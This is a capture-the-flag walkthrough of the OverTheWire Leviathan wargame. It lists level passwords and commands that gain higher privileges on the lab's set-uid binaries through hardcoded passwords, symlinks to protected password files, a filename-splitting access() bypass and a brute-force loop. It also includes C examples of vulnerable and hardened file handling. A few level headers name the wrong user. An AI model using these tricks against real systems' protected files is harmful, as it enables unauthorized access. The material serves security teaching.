Wargames study notes -- Leviathan
2022-07-03 20:05:00 【Zhaohg720】
Wargame link: https://overthewire.org/wargames/leviathan/
Level 0
Username: leviathan0
Password: leviathan0
Level 0 --> Level 1
Log in as leviathan0. In the home directory, run
ls -a
This shows a hidden directory, .backup, which contains an HTML file. Copy the file to the local machine, open it in a browser, and search for "password" to find the password:
Not Found
The requested URL /passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m was not found on this server.
Apache/2.4.10 (Debian) Server at leviathan.labs.overthewire.org Port 80
Level 1 --> Level 2
Log in as leviathan1. The home directory contains an executable file, check, which prompts for a password when run. Copy it to the local machine with scp and look at it in IDA.

The key part compares the input string with "sex". If the comparison succeeds, the program executes a shell. Enter that password at the password prompt to get a /bin/sh shell; it already has leviathan2's privileges, so simply cat the password file.
[email protected]:~$ ./check
password: sex
$ id
uid=12002(leviathan2) gid=12001(leviathan1) groups=12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta
$
Level 2 --> Level 3
Log in as leviathan2. The home directory contains an executable, printfile. According to its usage message, it should be able to read the password file directly.
[email protected]:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
[email protected]:~$ ls -l
total 8
-r-sr-x--- 1 leviathan3 leviathan2 7436 Aug 26 2019 printfile
Printing the password file directly reports that there is no such file, so look at the source code.
The key point is that the program checks the file given as input with access() and then prints it with cat. To bypass the check and have the input printed, create a symbolic link to the password file, create a file whose name begins with the symlink's name followed by a space, and then run the program on that file. access() checks the name as a single file, while the cat command splits it into two files, so cat prints the password.
mkdir /tmp/leviathan2
cd /tmp/leviathan2
ln -s /etc/leviathan_pass/leviathan3 getpass
touch "getpass 1.txt"
~/printfile getpass\ 1.txt
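The mismatch described above, reduced to a self-contained C program (an added example, not the printfile source): one function checks the name with access() and then hands it to a shell, the other opens it directly. The function names, the popen() call used to capture cat's output, and the scratch files are assumptions made for this demo.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Added example. Vulnerable pattern: ONE path is checked, then pasted into a shell line. */
int print_vulnerable(const char *name, char *out, size_t cap) {
    char cmd[512];
    if (access(name, R_OK) != 0) return -1;     /* checks "getpass 1.txt" */
    snprintf(cmd, sizeof cmd, "/bin/cat %s 2>/dev/null", name);
    FILE *p = popen(cmd, "r");                  /* sh runs: cat getpass 1.txt */
    if (!p) return -1;
    out[fread(out, 1, cap - 1, p)] = '\0';
    pclose(p);
    return 0;
}

/* Hardened form: drop to the real UID, then open the name directly (no shell). */
int print_hardened(const char *name, char *out, size_t cap) {
    if (seteuid(getuid()) != 0) return -1;      /* no-op when not set-uid */
    FILE *f = fopen(name, "r");
    if (!f) return -1;
    out[fread(out, 1, cap - 1, f)] = '\0';
    fclose(f);
    return 0;
}

static void write_file(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (f) { fputs(text, f); fclose(f); }
}

/* Constructed fixture: the file "getpass" stands in for the symlink to the protected file. */
int demo(char *vuln, char *safe, size_t cap) {
    char dir[] = "/tmp/printfile-demo-XXXXXX";
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    write_file("getpass", "SECRET\n");
    write_file("getpass 1.txt", "decoy\n");
    int a = print_vulnerable("getpass 1.txt", vuln, cap);
    int b = print_hardened("getpass 1.txt", safe, cap);
    unlink("getpass"); unlink("getpass 1.txt"); rmdir(dir);
    return (a < 0 || b < 0) ? -1 : 0;
}

int main(void) {
    char v[64], s[64];
    if (demo(v, s, sizeof v) == 0) printf("vulnerable: %shardened: %s", v, s);
    return 0;
}
```

The vulnerable function returns the contents of getpass even though it was asked for "getpass 1.txt"; the hardened one returns the file it was actually given.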
Level 3 --> Level 4
Log in as leviathan4. This level is very similar to the earlier one.

There is not much in the main function; the logic is in the do_stuff() function.

Obviously, the comparison string is snlprintf, and the same approach gets a shell.
./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12004(leviathan4) gid=12003(leviathan3) groups=12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
Level 4 --> Level 5
Log in as leviathan5. There is a hidden directory, .trash, which contains an executable file, bin.
[email protected]:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Aug 26 2019 .
drwxr-xr-x 10 root root 4096 Aug 26 2019 ..
-rw-r--r-- 1 root root 220 May 15 2017 .bash_logout
-rw-r--r-- 1 root root 3526 May 15 2017 .bashrc
-rw-r--r-- 1 root root 675 May 15 2017 .profile
dr-xr-x--- 2 root leviathan4 4096 Aug 26 2019 .trash
[email protected]:~/.trash$ ltrace ./bin
__libc_start_main(0x80484bb, 1, 0xffffd774, 0x80485b0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r") = 0
+++ exited (status 255) +++
[email protected]:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
Running the program directly prints the password in binary; converting each binary group to its ASCII character is all that is needed.
b_password = '01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010'
# Each space-separated group is one 8-bit ASCII code
password = ''.join(chr(int(bits, 2)) for bits in b_password.split(' '))
print(password)
Level 5 --> Level 6
Log in as leviathan6. There is an executable program; take a look at it in IDA.

It reads the contents of /tmp/file.log, a file that does not exist, so the symlink method works here as well.
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
Then run ./leviathan5 directly and the password is displayed.
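Why the symlink works, and the check a program reading a fixed name under /tmp would need, as an added C example (not the leviathan5 source). The function names and the scratch directory are assumptions, and the fixture is constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example. Behaviour described above: a fixed name is opened, symlinks followed. */
int read_following(const char *path, char *out, size_t cap) {
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    out[fread(out, 1, cap - 1, f)] = '\0';
    fclose(f);
    return 0;
}

/* Hardened: refuse a final-component symlink, then check type and owner on the fd. */
int read_checked(const char *path, uid_t owner, char *out, size_t cap) {
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -errno;                   /* ELOOP for a symlink */
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == owner;
    ssize_t n = ok ? read(fd, out, cap - 1) : -1;
    close(fd);
    out[n < 0 ? 0 : n] = '\0';
    if (!ok) return -EPERM;
    return n < 0 ? -EIO : 0;
}

/* Constructed fixture: "file.log" is a symlink to "secret" in a scratch directory. */
int demo(char *leaked, size_t cap, int *checked_rc) {
    char dir[] = "/tmp/filelog-demo-XXXXXX", buf[64];
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    FILE *f = fopen("secret", "w");
    if (!f || fputs("SECRET\n", f) < 0 || fclose(f) != 0) return -1;
    if (symlink("secret", "file.log") != 0) return -1;
    int rc = read_following("file.log", leaked, cap);
    *checked_rc = read_checked("file.log", getuid(), buf, sizeof buf);
    unlink("file.log"); unlink("secret"); rmdir(dir);
    return rc;
}

int main(void) {
    char leaked[64]; int rc = 0;
    if (demo(leaked, sizeof leaked, &rc) == 0) printf("followed: %schecked rc: %d\n", leaked, rc);
    return 0;
}
```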
Level 6 --> Level 7
Log in as leviathan6.
[email protected]:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
The usage message asks for a four-digit code, so it obviously wants us to brute-force it. Files on the target are deleted after a short time, which makes working there inconvenient, so copy the file to the local machine and brute-force it with a shell script.
#!/bin/bash
# Try every four-digit code in turn, echoing each code after it has been tried
for i in {1000..9999}
do
    /root/Desktop/leviathan6 "$i"
    echo "$i"
done
Wrong
7122
# ^C
# id
uid=0(root) gid=0(root) groups=0(root)
# ^C
#
You can see that when execution reaches 7123 it enters a shell, so enter 7123 directly on the target and then cat the password.
[email protected]:~$ ./leviathan6 7123
$ cat /etc/leviathan_pass/leviathan7